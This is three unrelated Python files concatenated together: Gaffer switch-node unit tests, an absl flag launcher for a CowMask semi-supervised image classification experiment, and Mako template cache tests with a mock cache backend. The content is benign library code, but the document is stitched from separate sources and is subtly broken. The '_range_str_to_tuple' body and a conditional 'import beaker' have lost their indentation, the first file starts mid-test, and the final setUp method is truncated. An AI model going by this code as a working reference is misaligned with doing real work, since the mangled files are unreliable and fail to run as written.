		# compute; out.source() follows to the selected upstream plug.
		n = Gaffer.SwitchDependencyNode()
		n["in"] = Gaffer.Plug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
		n["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )

		self.assertTrue( n["out"].source().isSame( n["in"] ) )

		input0 = Gaffer.Plug()
		input1 = Gaffer.Plug()
		input2 = Gaffer.Plug()

		n["in"].setInput( input0 )
		self.assertTrue( n["out"].source().isSame( input0 ) )

		n["in1"].setInput( input1 )
		self.assertTrue( n["out"].source().isSame( input0 ) )

		n["index"].setValue( 1 )
		self.assertTrue( n["out"].source().isSame( input1 ) )

		n["enabled"].setValue( False )
		self.assertTrue( n["out"].source().isSame( input0 ) )

		n["in2"].setInput( input2 )
		self.assertTrue( n["out"].source().isSame( input0 ) )

		n["enabled"].setValue( True )
		self.assertTrue( n["out"].source().isSame( input1 ) )

		n["index"].setValue( 2 )
		self.assertTrue( n["out"].source().isSame( input2 ) )

	def testIndexInputAcceptance( self ) :

		# The compute switch can evaluate computed index/enabled values,
		# but the dependency switch must reject them (it rewires statically
		# and so cannot depend on computed outputs).
		cs = Gaffer.SwitchComputeNode()
		ds = Gaffer.SwitchDependencyNode()

		a = GafferTest.AddNode()
		a["boolInput"] = Gaffer.BoolPlug()
		a["boolOutput"] = Gaffer.BoolPlug( direction=Gaffer.Plug.Direction.Out )

		self.assertTrue( cs["index"].acceptsInput( a["op1"] ) )
		self.assertTrue( cs["index"].acceptsInput( a["sum"] ) )

		self.assertTrue( ds["index"].acceptsInput( a["op1"] ) )
		self.assertFalse( ds["index"].acceptsInput( a["sum"] ) )

		self.assertTrue( cs["enabled"].acceptsInput( a["boolInput"] ) )
		self.assertTrue( cs["enabled"].acceptsInput( a["boolOutput"] ) )

		self.assertTrue( ds["enabled"].acceptsInput( a["boolInput"] ) )
		self.assertFalse( ds["enabled"].acceptsInput( a["boolOutput"] ) )

	def testDependencyNodeConnectedIndex( self ) :

		# The index may itself be driven by a connection; routing follows
		# its value, wrapping out-of-range indices.
		n = Gaffer.SwitchDependencyNode()
		n["in"] = Gaffer.Plug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
		n["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )

		input0 = Gaffer.Plug()
		input1 = Gaffer.Plug()
		input2 = Gaffer.Plug()

		n["in"].setInput( input0 )
		n["in1"].setInput( input1 )
		n["in2"].setInput( input2 )
		self.assertTrue( n["out"].source().isSame( input0 ) )

		indexInput = Gaffer.IntPlug()
		n["index"].setInput( indexInput )
		self.assertTrue( n["out"].source().isSame( input0 ) )

		indexInput.setValue( 1 )
		self.assertTrue( n["out"].source().isSame( input1 ) )

		indexInput.setValue( 2 )
		self.assertTrue( n["out"].source().isSame( input2 ) )

		indexInput.setValue( 3 )
		self.assertTrue( n["out"].source().isSame( input0 ) )

	def testDependencyNodeAcceptsNoneInputs( self ) :

		# Disconnecting (setting input to None) must always be allowed.
		n = Gaffer.SwitchDependencyNode()
		self.assertTrue( n["enabled"].acceptsInput( None ) )
		self.assertTrue( n["index"].acceptsInput( None ) )

	def setUp( self ) :

		GafferTest.TestCase.setUp( self )

		# Holds the free-standing plugs created by intPlug()/colorPlug()
		# so they stay alive for the duration of each test.
		self.__inputPlugs = []

	def tearDown( self ) :

		GafferTest.TestCase.tearDown( self )

		self.__inputPlugs = []
# Allow the test file to be run directly.
if __name__ == "__main__":
	unittest.main()
| |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch 'Milking CowMask for semi-supervised image classification'."""
import ast
from absl import app
from absl import flags
from absl import logging
import train_semisup
FLAGS = flags.FLAGS

# Command-line flags for the semi-supervised CowMask experiment; all values
# are forwarded verbatim to train_semisup.experiment() in main().
#
# Fixes relative to the previous revision:
# - 'imagenet_subset_dir' help was a copy-paste of 'model_dir'
#   ("Directory to store model data"); it now describes the actual purpose.
# - help-string typos 'aug_coowout' -> 'aug_cowout' and 'cutmixt' -> 'cutmix'
#   so the help matches the option names accepted by 'unsup_reg'/'mix_reg'.

flags.DEFINE_string(
    'model_dir', default='checkpoint',
    help=('Directory to store model data'))

flags.DEFINE_string(
    'imagenet_subset_dir', default=None,
    help=('Directory containing the ImageNet subset files (used when '
          'dataset=imagenet)'))

flags.DEFINE_string(
    'dataset', default='cifar10',
    help=('Dataset to use (cifar10|cifar100|svhn|imagenet)'))

flags.DEFINE_integer(
    'batch_size', default=256,
    help=('Batch size for training.'))

flags.DEFINE_integer(
    'eval_batch_size', default=1000,
    help=('Batch size for evaluation.'))

flags.DEFINE_integer(
    'num_epochs', default=300,
    help=('Number of training epochs.'))

flags.DEFINE_float(
    'learning_rate', default=0.05,
    help=('The learning rate for the momentum optimizer.'))

flags.DEFINE_bool(
    'aug_imagenet_apply_colour_jitter', default=False,
    help=('ImageNet augmentation: apply colour jitter.'))

flags.DEFINE_float(
    'aug_imagenet_greyscale_prob', default=0.0,
    help=('ImageNet augmentation: probability to convert image to greyscale.'))

flags.DEFINE_float(
    'sgd_momentum', default=0.9,
    help=('The decay rate used for the momentum optimizer.'))

flags.DEFINE_bool(
    'sgd_nesterov', default=True,
    help=('Use Nesterov momentum.'))

flags.DEFINE_string(
    'lr_schedule', default='stepped',
    help=('Learning rate schedule type; (constant|stepped|cosine)'))

flags.DEFINE_string(
    'lr_sched_steps', default='[[120, 0.2], [240, 0.04]]',
    help=('Learning rate schedule steps as a Python list; '
          '[[step1_epoch, step1_lr_scale], '
          '[step2_epoch, step2_lr_scale], ...]'))

flags.DEFINE_integer(
    'lr_sched_halfcoslength', default=300,
    help=('Length of cosine learning rate annealing half-cycle'))

flags.DEFINE_float(
    'lr_sched_warmup', default=0.0,
    help=('Learning rate schedule warmup length in epochs.'))

flags.DEFINE_float(
    'l2_reg', default=0.0005,
    help=('The amount of L2-regularization to apply.'))

flags.DEFINE_float(
    'weight_decay', default=0.0,
    help=('The amount of weight decay to apply.'))

flags.DEFINE_string(
    'architecture', default='wrn26_6_shakeshake',
    help=('Network architecture (wrn20_10|wrn26_10|wrn26_2|wrn20_6_shakeshake'
          '|wrn26_6_shakeshake|wrn26_2_shakeshake|pyramid|resnet50|resnet101'
          '|resnet152|resnet50x2|resnet101x2|resnet152x2|resnet50x4'
          '|resnet101x4|resnet152x4|resnext50_32x4d|resnext101_32x8d'
          '|resnext152_32x4d).'))

flags.DEFINE_integer(
    'n_val', default=0,
    help=('Number of samples to split off the training set for validation.'))

flags.DEFINE_integer(
    'n_sup', default=1000,
    help=('Number of samples to be used for supervised loss (-1 for all).'))

flags.DEFINE_float(
    'teacher_alpha', default=0.97,
    help=('Teacher EMA alpha.'))

flags.DEFINE_bool(
    'anneal_teacher_alpha', default=False,
    help=('Anneal 1-teacher_alpha using the learning rate schedule '
          '(no warmup).'))

flags.DEFINE_string(
    'unsup_reg', default='none',
    help=('Unsupervised/perturbation regularizer '
          '(none|mt|aug|cutout|aug_cutout|cowout|aug_cowout).'))

flags.DEFINE_float(
    'cons_weight', default=1.0,
    help=('Consistency (perturbation) loss weight.'))

flags.DEFINE_float(
    'conf_thresh', default=0.97,
    help=('Consistency (perturbation) confidence threshold.'))

flags.DEFINE_bool(
    'conf_avg', default=False,
    help=('Consistency (perturbation) confidence mask averaging.'))

flags.DEFINE_float(
    'cut_backg_noise', default=1.0,
    help=('Consistency (perturbation) cut background noise (e.g. 1.0 for '
          'RandErase).'))

flags.DEFINE_float(
    'cut_prob', default=1.0,
    help=('Consistency (perturbation) cut probability.'))

flags.DEFINE_string(
    'box_reg_scale_mode', default='random_size',
    help=('Consistency (perturbation), unsup_reg is cutout/aug_cutout: box '
          'mask scaling (fixed|random_area|random_size).'))

flags.DEFINE_float(
    'box_reg_scale', default=0.25,
    help=('Consistency (perturbation), unsup_reg is cutout/aug_cutout: '
          'fraction of the image to mask out when box scale mode is fixed.'))

flags.DEFINE_bool(
    'box_reg_random_aspect_ratio', default=True,
    help=('Consistency (perturbation), unsup_reg is cutout/aug_cutout: vary '
          'the aspect ratio of the box'))

flags.DEFINE_string(
    'cow_sigma_range', default='4.0:16.0',
    help=('Consistency (perturbation), unsup_reg is cowout/aug_cowout: the '
          'range of the Gaussian smoothing sigma that controls the scale of '
          'CowMask'))

flags.DEFINE_string(
    'cow_prop_range', default='0.25:1.0',
    help=('Consistency (perturbation), unsup_reg is cowout/aug_cowout: the '
          'range of proportion of the image to be masked out by CowMask'))

flags.DEFINE_string(
    'mix_reg', default='cowmix',
    help=('Mix regularizer '
          '(none|ict|cutmix|cowmix).'))

flags.DEFINE_bool(
    'mix_aug_separately', default=False,
    help=('Mix regularization, use different augmentations for teacher '
          '(unmixed) and student (mixed) paths'))

flags.DEFINE_bool(
    'mix_logits', default=False,
    help=('Mix regularization, mix pre-softmax logits rather than '
          'post-softmax probabilities'))

flags.DEFINE_float(
    'mix_weight', default=30.0,
    help=('Mix regularization, mix consistency loss weight.'))

flags.DEFINE_float(
    'mix_conf_thresh', default=0.6,
    help=('Mix regularization, confidence threshold.'))

flags.DEFINE_bool(
    'mix_conf_avg', default=True,
    help=('Mix regularization, average confidence threshold masks'))

flags.DEFINE_string(
    'mix_conf_mode', default='mix_conf',
    help=('Mix either confidence or probabilities for confidence '
          'thresholding (prob|conf).'))

flags.DEFINE_float(
    'ict_alpha', default=0.1,
    help=('Mix regularization, mix_reg=ict: ICT Beta distribution alpha '
          'parameter.'))

flags.DEFINE_string(
    'mix_box_reg_scale_mode', default='random_area',
    help=('Mix regularization, mix_reg=cutmix: box '
          'mask scaling (fixed|random_area|random_size).'))

flags.DEFINE_float(
    'mix_box_reg_scale', default=0.25,
    help=('Mix regularization, mix_reg=cutmix: '
          'fraction of the image to mask out when box scale mode is fixed.'))

flags.DEFINE_bool(
    'mix_box_reg_random_aspect_ratio', default=True,
    help=('Mix regularization, mix_reg=cutmix: vary '
          'the aspect ratio of the box'))

flags.DEFINE_string(
    'mix_cow_sigma_range', default='4.0:16.0',
    help=('Mix regularization, mix_reg=cowmix: the '
          'range of the Gaussian smoothing sigma that controls the scale of '
          'CowMask'))

flags.DEFINE_string(
    'mix_cow_prop_range', default='0.2:0.8',
    help=('Mix regularization, mix_reg=cowmix: the '
          'range of proportion of the image to be masked out by CowMask'))

flags.DEFINE_integer(
    'subset_seed', default=12345,
    help=('Random seed used to choose supervised samples (n_sup != -1).'))

flags.DEFINE_integer(
    'val_seed', default=131,
    help=('Random seed used to choose validation samples (when n_val > 0).'))

flags.DEFINE_integer(
    'run_seed', default=None,
    help=('Random seed used for network initialisation and training. If '
          'run_seed = None then one will be generated using n_val '
          'and subset_seed.'))

flags.DEFINE_string(
    'checkpoints', default='on',
    help=('Checkpointing after each epoch (none|on|retain); '
          'disabled/enabled/retain'))
def _range_str_to_tuple(s):
xs = [x.strip() for x in s.split(':')]
return tuple([float(x) for x in xs])
def main(argv):
  """Entry point: forwards all flag values to train_semisup.experiment().

  Args:
    argv: command-line arguments as delivered by absl.app.run; only the
      program name is expected, since all configuration comes from flags.

  Raises:
    app.UsageError: if unexpected positional arguments are supplied.
  """
  if len(argv) > 1:
    raise app.UsageError('Too many command-line arguments.')
  # Note: lr_sched_steps is parsed with ast.literal_eval (safe, literals
  # only) and the *_range flags are converted from 'lo:hi' strings to
  # float tuples before being handed to the experiment.
  train_semisup.experiment(
      model_dir=FLAGS.model_dir, imagenet_subset_dir=FLAGS.imagenet_subset_dir,
      dataset=FLAGS.dataset, batch_size=FLAGS.batch_size,
      eval_batch_size=FLAGS.eval_batch_size, num_epochs=FLAGS.num_epochs,
      learning_rate=FLAGS.learning_rate,
      aug_imagenet_apply_colour_jitter=FLAGS.aug_imagenet_apply_colour_jitter,
      aug_imagenet_greyscale_prob=FLAGS.aug_imagenet_greyscale_prob,
      sgd_momentum=FLAGS.sgd_momentum, sgd_nesterov=FLAGS.sgd_nesterov,
      lr_schedule=FLAGS.lr_schedule,
      lr_sched_steps=ast.literal_eval(FLAGS.lr_sched_steps),
      lr_sched_halfcoslength=FLAGS.lr_sched_halfcoslength,
      lr_sched_warmup=FLAGS.lr_sched_warmup, l2_reg=FLAGS.l2_reg,
      weight_decay=FLAGS.weight_decay,
      architecture=FLAGS.architecture, n_val=FLAGS.n_val, n_sup=FLAGS.n_sup,
      teacher_alpha=FLAGS.teacher_alpha,
      anneal_teacher_alpha=FLAGS.anneal_teacher_alpha,
      unsupervised_regularizer=FLAGS.unsup_reg,
      cons_weight=FLAGS.cons_weight, conf_thresh=FLAGS.conf_thresh,
      conf_avg=FLAGS.conf_avg,
      cut_backg_noise=FLAGS.cut_backg_noise, cut_prob=FLAGS.cut_prob,
      box_reg_scale_mode=FLAGS.box_reg_scale_mode,
      box_reg_scale=FLAGS.box_reg_scale,
      box_reg_random_aspect_ratio=FLAGS.box_reg_random_aspect_ratio,
      cow_sigma_range=_range_str_to_tuple(FLAGS.cow_sigma_range),
      cow_prop_range=_range_str_to_tuple(FLAGS.cow_prop_range),
      mix_regularizer=FLAGS.mix_reg,
      mix_aug_separately=FLAGS.mix_aug_separately, mix_logits=FLAGS.mix_logits,
      mix_weight=FLAGS.mix_weight, mix_conf_thresh=FLAGS.mix_conf_thresh,
      mix_conf_avg=FLAGS.mix_conf_avg,
      mix_conf_mode=FLAGS.mix_conf_mode,
      ict_alpha=FLAGS.ict_alpha,
      mix_box_reg_scale_mode=FLAGS.mix_box_reg_scale_mode,
      mix_box_reg_scale=FLAGS.mix_box_reg_scale,
      mix_box_reg_random_aspect_ratio=FLAGS.mix_box_reg_random_aspect_ratio,
      mix_cow_sigma_range=_range_str_to_tuple(FLAGS.mix_cow_sigma_range),
      mix_cow_prop_range=_range_str_to_tuple(FLAGS.mix_cow_prop_range),
      subset_seed=FLAGS.subset_seed, val_seed=FLAGS.val_seed,
      run_seed=FLAGS.run_seed,
      log_fn=logging.info, checkpoints=FLAGS.checkpoints)
# absl.app parses flags before invoking main().
if __name__ == '__main__':
  app.run(main)
| |
import time
from mako import lookup
from mako.cache import CacheImpl
from mako.cache import register_plugin
from mako.compat import py27
from mako.ext import beaker_cache
from mako.lookup import TemplateLookup
from mako.template import Template
from test import eq_
from test import module_base
from test import SkipTest
from test import TemplateTest
from test.util import result_lines
if beaker_cache.has_beaker:
import beaker
class SimpleBackend(object):
    """Trivial dict-backed cache backend used as the default mock target."""

    def __init__(self):
        self.cache = {}

    def get(self, key, **kw):
        # Strict lookup: raises KeyError when the key is absent.
        return self.cache[key]

    def invalidate(self, key, **kw):
        # Missing keys are silently ignored.
        self.cache.pop(key, None)

    def put(self, key, value, **kw):
        self.cache[key] = value

    def get_or_create(self, key, creation_function, **kw):
        # EAFP: try the lookup first, create and store on a miss.
        try:
            return self.cache[key]
        except KeyError:
            value = creation_function()
            self.cache[key] = value
            return value
class MockCacheImpl(CacheImpl):
    """Cache plugin that records the key/kwargs of each call and then
    delegates to a real backend (SimpleBackend or a loaded mako impl)."""

    realcacheimpl = None

    def __init__(self, cache):
        self.cache = cache

    def set_backend(self, cache, backend):
        if backend == "simple":
            self.realcacheimpl = SimpleBackend()
        else:
            self.realcacheimpl = cache._load_impl(backend)

    def _setup_kwargs(self, kw):
        # Store a filtered copy of the kwargs for later test assertions:
        # drop the plumbing arguments, and drop "region" unless it is the
        # custom "myregion" value the tests look for.
        kwargs = dict(kw)
        for name in ("regions", "manager"):
            kwargs.pop(name, None)
        if kwargs.get("region") != "myregion":
            kwargs.pop("region", None)
        self.kwargs = kwargs

    def _record(self, key, kw):
        # Remember the last key and (filtered) kwargs seen.
        self.key = key
        self._setup_kwargs(kw)

    def get_or_create(self, key, creation_function, **kw):
        self._record(key, kw)
        return self.realcacheimpl.get_or_create(key, creation_function, **kw)

    def put(self, key, value, **kw):
        self._record(key, kw)
        self.realcacheimpl.put(key, value, **kw)

    def get(self, key, **kw):
        self._record(key, kw)
        return self.realcacheimpl.get(key, **kw)

    def invalidate(self, key, **kw):
        self._record(key, kw)
        self.realcacheimpl.invalidate(key, **kw)
# Make MockCacheImpl available to mako templates as cache_impl="mock".
register_plugin("mock", __name__, "MockCacheImpl")
class CacheTest(TemplateTest):
    """Tests for mako's <%def>/<%page>/<%block> caching, run through the
    recording MockCacheImpl so the cache key and kwargs can be asserted."""

    # Backend that MockCacheImpl delegates to; subclasses override this
    # to run the same tests against real backends.
    real_backend = "simple"

    def _install_mock_cache(self, template, implname=None):
        # Swap the template's cache implementation for the mock and return
        # the mock so tests can inspect .key / .kwargs afterwards.
        template.cache_impl = "mock"
        impl = template.cache.impl
        impl.set_backend(template.cache, implname or self.real_backend)
        return impl

    def test_def(self):
        # A cached def should execute its body only once across renders.
        t = Template(
            """
        <%!
            callcount = [0]
        %>
        <%def name="foo()" cached="True">
            this is foo
            <%
            callcount[0] += 1
            %>
        </%def>

        ${foo()}
        ${foo()}
        ${foo()}
        callcount: ${callcount}
"""
        )
        m = self._install_mock_cache(t)
        assert result_lines(t.render()) == [
            "this is foo",
            "this is foo",
            "this is foo",
            "callcount: [1]",
        ]
        assert m.kwargs == {}

    def test_cache_enable(self):
        # cache_enabled=False on the Template disables cached="True".
        t = Template(
            """
        <%!
            callcount = [0]
        %>
        <%def name="foo()" cached="True">
            <% callcount[0] += 1 %>
        </%def>
        ${foo()}
        ${foo()}
        callcount: ${callcount}
""",
            cache_enabled=False,
        )
        self._install_mock_cache(t)
        eq_(t.render().strip(), "callcount: [2]")

    def test_nested_def(self):
        # Caching also applies to defs nested inside other defs.
        t = Template(
            """
        <%!
            callcount = [0]
        %>
        <%def name="foo()">
            <%def name="bar()" cached="True">
                this is foo
                <%
                callcount[0] += 1
                %>
            </%def>
            ${bar()}
        </%def>

        ${foo()}
        ${foo()}
        ${foo()}
        callcount: ${callcount}
"""
        )
        m = self._install_mock_cache(t)
        assert result_lines(t.render()) == [
            "this is foo",
            "this is foo",
            "this is foo",
            "callcount: [1]",
        ]
        assert m.kwargs == {}

    def test_page(self):
        # <%page cached="True"/> caches the whole template body.
        t = Template(
            """
        <%!
            callcount = [0]
        %>
        <%page cached="True"/>
        this is foo
        <%
        callcount[0] += 1
        %>
        callcount: ${callcount}
"""
        )
        m = self._install_mock_cache(t)
        t.render()
        t.render()
        assert result_lines(t.render()) == ["this is foo", "callcount: [1]"]
        assert m.kwargs == {}

    def test_dynamic_key_with_context(self):
        # cache_key may be an expression evaluated against the render
        # context, for both <%block> and <%def>.
        t = Template(
            """
            <%block name="foo" cached="True" cache_key="${mykey}">
            some block
            </%block>
        """
        )
        m = self._install_mock_cache(t)
        t.render(mykey="thekey")
        t.render(mykey="thekey")
        eq_(result_lines(t.render(mykey="thekey")), ["some block"])
        eq_(m.key, "thekey")

        t = Template(
            """
            <%def name="foo()" cached="True" cache_key="${mykey}">
            some def
            </%def>
            ${foo()}
        """
        )
        m = self._install_mock_cache(t)
        t.render(mykey="thekey")
        t.render(mykey="thekey")
        eq_(result_lines(t.render(mykey="thekey")), ["some def"])
        eq_(m.key, "thekey")

    def test_dynamic_key_with_funcargs(self):
        # cache_key expressions can reference the def's own arguments,
        # including defaults, **kwargs, and <%page args>.
        t = Template(
            """
        <%def name="foo(num=5)" cached="True" cache_key="foo_${str(num)}">
         hi
        </%def>

        ${foo()}
    """
        )
        m = self._install_mock_cache(t)
        t.render()
        t.render()
        assert result_lines(t.render()) == ["hi"]
        assert m.key == "foo_5"

        t = Template(
            """
        <%def name="foo(*args, **kwargs)" cached="True"
         cache_key="foo_${kwargs['bar']}">
         hi
        </%def>

        ${foo(1, 2, bar='lala')}
    """
        )
        m = self._install_mock_cache(t)
        t.render()
        assert result_lines(t.render()) == ["hi"]
        assert m.key == "foo_lala"

        t = Template(
            """
        <%page args="bar='hi'" cache_key="foo_${bar}" cached="True"/>
         hi
    """
        )
        m = self._install_mock_cache(t)
        t.render()
        assert result_lines(t.render()) == ["hi"]
        assert m.key == "foo_hi"

    def test_dynamic_key_with_imports(self):
        # A page-level dynamic cache_key still works when the template
        # also performs namespace imports.
        lookup = TemplateLookup()
        lookup.put_string(
            "foo.html",
            """
        <%!
            callcount = [0]
        %>
        <%namespace file="ns.html" import="*"/>
        <%page cached="True" cache_key="${foo}"/>
        this is foo
        <%
        callcount[0] += 1
        %>
        callcount: ${callcount}
""",
        )
        lookup.put_string("ns.html", """""")
        t = lookup.get_template("foo.html")
        m = self._install_mock_cache(t)
        t.render(foo="somekey")
        t.render(foo="somekey")
        assert result_lines(t.render(foo="somekey")) == [
            "this is foo",
            "callcount: [1]",
        ]
        assert m.kwargs == {}

    def test_fileargs_implicit(self):
        # cache_type on the tag is passed through to the backend kwargs.
        l = lookup.TemplateLookup(module_directory=module_base)
        l.put_string(
            "test",
            """
        <%!
            callcount = [0]
        %>
        <%def name="foo()" cached="True" cache_type='dbm'>
            this is foo
            <%
            callcount[0] += 1
            %>
        </%def>

        ${foo()}
        ${foo()}
        ${foo()}
        callcount: ${callcount}
""",
        )
        m = self._install_mock_cache(l.get_template("test"))
        assert result_lines(l.get_template("test").render()) == [
            "this is foo",
            "this is foo",
            "this is foo",
            "callcount: [1]",
        ]
        eq_(m.kwargs, {"type": "dbm"})

    def test_fileargs_deftag(self):
        # cache_type/cache_dir specified directly on the <%def> tag.
        t = Template(
            """
        <%%!
            callcount = [0]
        %%>
        <%%def name="foo()" cached="True" cache_type='file' cache_dir='%s'>
            this is foo
            <%%
            callcount[0] += 1
            %%>
        </%%def>

        ${foo()}
        ${foo()}
        ${foo()}
        callcount: ${callcount}
"""
            % module_base
        )
        m = self._install_mock_cache(t)
        assert result_lines(t.render()) == [
            "this is foo",
            "this is foo",
            "this is foo",
            "callcount: [1]",
        ]
        assert m.kwargs == {"type": "file", "dir": module_base}

    def test_fileargs_pagetag(self):
        # cache args given on <%page> apply to cached defs in the page.
        t = Template(
            """
        <%%page cache_dir='%s' cache_type='dbm'/>
        <%%!
            callcount = [0]
        %%>
        <%%def name="foo()" cached="True">
            this is foo
            <%%
            callcount[0] += 1
            %%>
        </%%def>

        ${foo()}
        ${foo()}
        ${foo()}
        callcount: ${callcount}
"""
            % module_base
        )
        m = self._install_mock_cache(t)
        assert result_lines(t.render()) == [
            "this is foo",
            "this is foo",
            "this is foo",
            "callcount: [1]",
        ]
        eq_(m.kwargs, {"dir": module_base, "type": "dbm"})

    def test_args_complete(self):
        # All cache_* arguments together; cache_key itself is not part of
        # the backend kwargs.
        t = Template(
            """
        <%%def name="foo()" cached="True" cache_timeout="30" cache_dir="%s"
         cache_type="file" cache_key='somekey'>
        this is foo
        </%%def>

        ${foo()}
"""
            % module_base
        )
        m = self._install_mock_cache(t)
        t.render()
        eq_(m.kwargs, {"dir": module_base, "type": "file", "timeout": 30})

        t2 = Template(
            """
        <%%page cached="True" cache_timeout="30" cache_dir="%s"
         cache_type="file" cache_key='somekey'/>
        hi
        """
            % module_base
        )
        m = self._install_mock_cache(t2)
        t2.render()
        eq_(m.kwargs, {"dir": module_base, "type": "file", "timeout": 30})

    def test_fileargs_lookup(self):
        # cache args configured on the TemplateLookup itself.
        l = lookup.TemplateLookup(cache_dir=module_base, cache_type="file")
        l.put_string(
            "test",
            """
        <%!
            callcount = [0]
        %>
        <%def name="foo()" cached="True">
            this is foo
            <%
            callcount[0] += 1
            %>
        </%def>

        ${foo()}
        ${foo()}
        ${foo()}
        callcount: ${callcount}
""",
        )
        t = l.get_template("test")
        m = self._install_mock_cache(t)
        assert result_lines(l.get_template("test").render()) == [
            "this is foo",
            "this is foo",
            "this is foo",
            "callcount: [1]",
        ]
        eq_(m.kwargs, {"dir": module_base, "type": "file"})

    def test_buffered(self):
        # buffered="True" defs interact with buffer_filters; the filter
        # output (not the raw body) is what gets cached and re-emitted.
        t = Template(
            """
        <%!
            def a(text):
                return "this is a " + text.strip()
        %>
        ${foo()}
        ${foo()}
        <%def name="foo()" cached="True" buffered="True">
            this is a test
        </%def>
        """,
            buffer_filters=["a"],
        )
        self._install_mock_cache(t)
        eq_(
            result_lines(t.render()),
            ["this is a this is a test", "this is a this is a test"],
        )

    def test_load_from_expired(self):
        """test that the cache callable can be called safely after the
        originating template has completed rendering.

        """
        t = Template(
            """
        ${foo()}
        <%def name="foo()" cached="True" cache_timeout="1">
            foo
        </%def>
        """
        )
        self._install_mock_cache(t)

        x1 = t.render()
        time.sleep(1.2)
        x2 = t.render()
        assert x1.strip() == x2.strip() == "foo"

    def test_namespace_access(self):
        # local.cache.invalidate_def() clears one def's cached value.
        t = Template(
            """
            <%def name="foo(x)" cached="True">
                foo: ${x}
            </%def>

            <%
                foo(1)
                foo(2)
                local.cache.invalidate_def('foo')
                foo(3)
                foo(4)
            %>
        """
        )
        self._install_mock_cache(t)
        eq_(result_lines(t.render()), ["foo: 1", "foo: 1", "foo: 3", "foo: 3"])

    def test_lookup(self):
        # cache_impl configured on the lookup propagates to templates.
        l = TemplateLookup(cache_impl="mock")
        l.put_string(
            "x",
            """
            <%page cached="True" />
            ${y}
        """,
        )
        t = l.get_template("x")
        self._install_mock_cache(t)
        assert result_lines(t.render(y=5)) == ["5"]
        # second render returns the cached body, ignoring the new y.
        assert result_lines(t.render(y=7)) == ["5"]
        assert isinstance(t.cache.impl, MockCacheImpl)

    def test_invalidate(self):
        # invalidate_def()/invalidate_body() only clear the targeted
        # entries; other cached content survives.
        t = Template(
            """
            <%%def name="foo()" cached="True">
                foo: ${x}
            </%%def>

            <%%def name="bar()" cached="True" cache_type='dbm' cache_dir='%s'>
                bar: ${x}
            </%%def>
            ${foo()} ${bar()}
        """
            % module_base
        )
        self._install_mock_cache(t)
        assert result_lines(t.render(x=1)) == ["foo: 1", "bar: 1"]
        assert result_lines(t.render(x=2)) == ["foo: 1", "bar: 1"]
        t.cache.invalidate_def("foo")
        assert result_lines(t.render(x=3)) == ["foo: 3", "bar: 1"]
        t.cache.invalidate_def("bar")
        assert result_lines(t.render(x=4)) == ["foo: 3", "bar: 4"]

        t = Template(
            """
            <%%page cached="True" cache_type="dbm" cache_dir="%s"/>
            page: ${x}
        """
            % module_base
        )
        self._install_mock_cache(t)
        assert result_lines(t.render(x=1)) == ["page: 1"]
        assert result_lines(t.render(x=2)) == ["page: 1"]
        t.cache.invalidate_body()
        assert result_lines(t.render(x=3)) == ["page: 3"]
        assert result_lines(t.render(x=4)) == ["page: 3"]

    def test_custom_args_def(self):
        # Arbitrary cache_<name> args are forwarded to the backend,
        # along with the recognised region/timeout args.
        t = Template(
            """
        <%def name="foo()" cached="True" cache_region="myregion"
                cache_timeout="50" cache_foo="foob">
        </%def>
        ${foo()}
    """
        )
        m = self._install_mock_cache(t, "simple")
        t.render()
        eq_(m.kwargs, {"region": "myregion", "timeout": 50, "foo": "foob"})

    def test_custom_args_block(self):
        # Same custom-args pass-through for <%block>.
        t = Template(
            """
        <%block name="foo" cached="True" cache_region="myregion"
                cache_timeout="50" cache_foo="foob">
        </%block>
    """
        )
        m = self._install_mock_cache(t, "simple")
        t.render()
        eq_(m.kwargs, {"region": "myregion", "timeout": 50, "foo": "foob"})

    def test_custom_args_page(self):
        # Same custom-args pass-through for <%page>.
        t = Template(
            """
        <%page cached="True" cache_region="myregion"
                cache_timeout="50" cache_foo="foob"/>
    """
        )
        m = self._install_mock_cache(t, "simple")
        t.render()
        eq_(m.kwargs, {"region": "myregion", "timeout": 50, "foo": "foob"})

    def test_pass_context(self):
        # When the impl sets pass_context, the render context is included
        # in the kwargs passed to the backend.
        t = Template(
            """
        <%page cached="True"/>
        """
        )
        m = self._install_mock_cache(t)
        t.render()
        assert "context" not in m.kwargs

        m.pass_context = True
        t.render(x="bar")
        assert "context" in m.kwargs
        assert m.kwargs["context"].get("x") == "bar"
class RealBackendTest(object):
    """Mixin with tests that exercise a real caching backend (expiry,
    regions); concrete subclasses supply the backend via
    _install_mock_cache()."""
    def test_cache_uses_current_context(self):
        """After the 1s timeout expires, the def re-renders using the
        context of the *current* call, not the cached one."""
        t = Template(
            """
        ${foo()}
        <%def name="foo()" cached="True" cache_timeout="1">
            foo: ${x}
        </%def>
    """
        )
        self._install_mock_cache(t)
        x1 = t.render(x=1)
        # Sleep past the cache_timeout so the entry expires.
        time.sleep(1.2)
        x2 = t.render(x=2)
        eq_(x1.strip(), "foo: 1")
        eq_(x2.strip(), "foo: 2")
    def test_region(self):
        """Blocks in the "short" region expire after ~1s; "long"-region
        blocks persist; uncached blocks re-render every time."""
        t = Template(
            """
        <%block name="foo" cached="True" cache_region="short">
            short term ${x}
        </%block>
        <%block name="bar" cached="True" cache_region="long">
            long term ${x}
        </%block>
        <%block name="lala">
            none ${x}
        </%block>
    """
        )
        self._install_mock_cache(t)
        r1 = result_lines(t.render(x=5))
        # Let the "short" region expire; "long" should survive.
        time.sleep(1.2)
        r2 = result_lines(t.render(x=6))
        r3 = result_lines(t.render(x=7))
        eq_(r1, ["short term 5", "long term 5", "none 5"])
        eq_(r2, ["short term 6", "long term 5", "none 6"])
        eq_(r3, ["short term 6", "long term 5", "none 7"])
class BeakerCacheTest(RealBackendTest, CacheTest):
    """Runs the cache suite against the Beaker backend."""
    real_backend = "beaker"
    def setUp(self):
        # Skip when Beaker is unavailable or on pre-2.7 Pythons.
